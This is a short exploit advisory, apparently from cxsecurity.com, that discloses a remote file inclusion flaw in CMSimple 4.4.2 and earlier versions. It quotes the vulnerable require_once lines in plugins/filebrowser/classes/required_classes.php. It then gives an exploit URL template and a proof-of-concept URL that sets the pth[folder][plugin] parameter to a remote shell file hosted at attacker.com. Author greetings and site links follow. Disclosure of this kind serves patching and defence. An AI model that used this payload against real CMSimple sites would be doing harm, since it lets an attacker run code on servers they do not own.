CMSimple 4.4.2 Remote File Inclusion

Published
Credit
Risk
2014.04.18
NoGe
High
CWE
CVE
Local
Remote
CWE-22
N/A
No
Yes

=============================================================================================================


[o] CMSimple - Open Source CMS with no database <= Remote File Inclusion Vulnerability

Software : CMSimple - Open Source CMS with no database
Version : 4.4, 4.4.2 and below
Vendor : http://www.cmsimple.org
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com
Desc : CMSimple is a php based Content Managemant System (CMS), which requires no database.
All data are stored in a simple file system.


=============================================================================================================


[o] Vulnerable File

plugins/filebrowser/classes/required_classes.php

require_once $pth['folder']['plugin'] . 'classes/filebrowser_view.php';
require_once $pth['folder']['plugin'] . 'classes/filebrowser.php';


=============================================================================================================


[o] Exploit

http://localhost/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=[RFI]


=============================================================================================================


[o] PoC

http://target.com/[path]/plugins/filebrowser/classes/required_classes.php?pth[folder][plugin]=http://attacker.com/shell.txt?


=============================================================================================================


[o] Greetz

Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
aJe kaka11 matthews wishnusakti inc0mp13te martfella
pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


[o] April 17 2014 - Papua, Indonesia - Met Paskah! Tuhan berkati.. :)

References:

http://cxsecurity.com/issue/WLB-2014030166


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com